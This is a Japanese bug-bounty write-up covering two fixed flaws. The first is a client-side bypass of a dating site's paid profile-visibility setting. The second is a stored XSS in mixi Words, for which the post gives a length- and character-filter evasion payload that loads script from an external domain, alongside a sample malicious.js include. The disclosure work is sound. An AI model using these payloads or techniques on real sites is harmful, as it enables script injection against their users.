youbrideの有料機能を無料で使える問題

• 2014/03/12 報告
• 2014/03/18 修正完了
• 2014/03/24 75,000円のAmazonギフトが届いた

youbrideはmixiの子会社の株式会社Diverseが運営する婚活サイト。一時、制度の対象だった。
youbrideでは無料ユーザーはプロフィールの公開条件は「全体に公開」しか選べない。

ChromeのDeveloper Toolで他の選択肢を有効にしたら、「全体に公開」以外の公開条件も選べてしまった。

mixiワードのXSS

• 2014/03/31 報告
• 2014/03/31 修正完了
• 2014/04/09 125,000円のAmazonギフトが届いた

mixiワードにXSS可能な脆弱性があった。

「猫」には、キャットタワー、キャットフード、猫の里親募集、捨て猫、子猫、イルカ、ペンギンなどのワードが関連しており、…

の部分。mixiワードはコミュニティを作成し、関連ワードから追加できる。出力時には何もエスケープされないけれど、文字数が30文字以内、/, (, )などが全角文字に変換されるという制限がある。

<script>alert(0)</script>

というようにスクリプトを埋め込もうとしても、scriptタグが閉じられない。後続の文字がスクリプトとして認識されると文法的にエラーになってスクリプトが動かない。スクリプト中で()が使えないのもつらい。

<script src="http://example.com/malicious.js">

と外部のスクリプトを読み込もうにも/が使えない。
答え

<script src=&#47&#47イマ.net>

27文字。属性値ならば実体参照が使える。短いドメインを持っていて良かった。報告したときは、イマ.netのトップページがJavaScriptを返すようにした。ちなみに、mixiワードは一度作ったら消せないらしい。変なワードを作ってしまって申し訳ない。